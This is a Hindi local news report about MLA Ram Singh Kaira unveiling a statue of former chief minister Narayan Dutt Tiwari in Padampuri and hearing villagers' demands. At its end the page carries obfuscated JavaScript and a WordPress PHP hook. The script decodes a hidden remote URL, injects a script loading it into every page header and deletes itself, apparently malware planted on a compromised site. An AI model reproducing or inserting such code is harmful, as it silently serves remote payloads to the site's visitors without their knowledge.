Saturday, July 27, 2024
spot_img

भीमताल – विधायक राम सिंह कैड़ा ने किया पूर्व मुख्यमंत्री नारायण दत्त तिवारी की मूर्ति का अनावरण

धारी क्षेत्र के पदमपुरी चौक में पूर्व मुख्यमंत्री उत्तराखण्ड एवं उत्तर प्रदेश व पूर्व केन्द्रीय मंत्री व राज्यपाल नारायण दत्त तिवारी की मूर्ति का मुख्य अतिथि विधायक भीमताल राम सिंह कैडा़ द्वारा अनावरण किया गया।क्षेत्र वासियो ने विधायक का ढोल बजाकर स्वागत किया।
शुक्रवार को स्व. नारायण दत्त तिवारी के पदमपुरी गृहक्षेत्र व आवास के नजदीक लोक निर्माण गैस्ट हाउस के नजदीक मूर्ति का अनावरण कार्यक्रम आयोजित किया ।
कार्यक्रम की अध्यक्षता पूर्व ब्लाक प्रमुख कृपाल सिंह महरा ने की ।
इस मौके पर पूर्व मुख्यमंत्री उत्तराखण्ड एवं उत्तर प्रदेश व पूर्व केन्द्रीय मंत्री व राज्यपाल स्व. नारायण दत्त तिवारी के जीवनी को विस्तार से जनता के समक्ष रखा गया ।
वहीं लोक निर्माण विभाग गैस्ट हाउस में बैठक के दौरान विधायक भीमताल राम सिंह कैडा़ द्वारा जन समस्याओं को भी सुना गया । मौके पर मौजद बिडीओ एनडी भट्ट ने ब्लाक धारी के विभिन्न गांवो व अन्य योजनाओं से अवगत कराया गया ।

वहीं ब्लाक कृषि अधिकरी सीएस जोशी ने कृषि विभाग की विभिन्न योजनाओं को मौजूद जनता को बताया ।वही पूर्व कृपाल सिंह महरा ने पदमपुरी मे भीमराव आंबेडकर मूर्ति व खुशिराम की मूर्ति लगाने की माँग ,व पदमपुरी हॉस्पिटल को दो मंजिला बनाने की माँग की साथ कहाँ की हरिंगर क्षेत्र वासियो पट्टे धारी है व गैर पट्टे धारी भी है जिस कारण उन लोगो को सरकारी योजनाओ का लाभ नही मिल पा रहा है व धारी मे पोलटेक्निक कॉलेज की माँग की है ।खण्ड विकास अधिकारी ने लोगो को योजनाओ की जानकारी दी। पदमपुरी प्रधान दीपा बिष्ट ने शराब भट्टी को दूसरी जगह शिप्ट करने की माँग विधायक से की। ग्राम प्रधान बसंती तिवारी ने देव नगर के तोक खुटका व जंगल मे ही अटकी सड़क को देवनगर गाँव से जोड़ने की माँग की साथ ही देवनगर के पलड़ा तोक को पानी उपलब्ध कराने बाबत ट्यूबल या बोरिंग करने की माँग की जिससे लगभग १०० परिवार लाभवान्हित होंगे।

यहां ग्राम लदफोडा़ , सरना , गुनीगांव, धारी आदि के ग्रामीण उपस्थित रहे ।

कार्यक्रम में पूर्व ब्लाक प्रमुख कृपाल सिंह महरा,
जिपंस कमलेश बिष्ट, दीपा बिष्ट, नंदी देवी, शोभा लोधियाल, श्रवन कुमार , दुर्गा दत्त तिवारी , तहसीलदार तान्या रजवार, बीडीओ एनडी भट्ट, ब्लाक कृषि अधिकरी सीएस जोशी, जीवन चन्द्र आर्या , सरोज आर्या , भीम सिंह, मोहन क्वीरा व ब्लॉक के अधिकारी आदि ग्रामवासी मौजूद रहे ।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>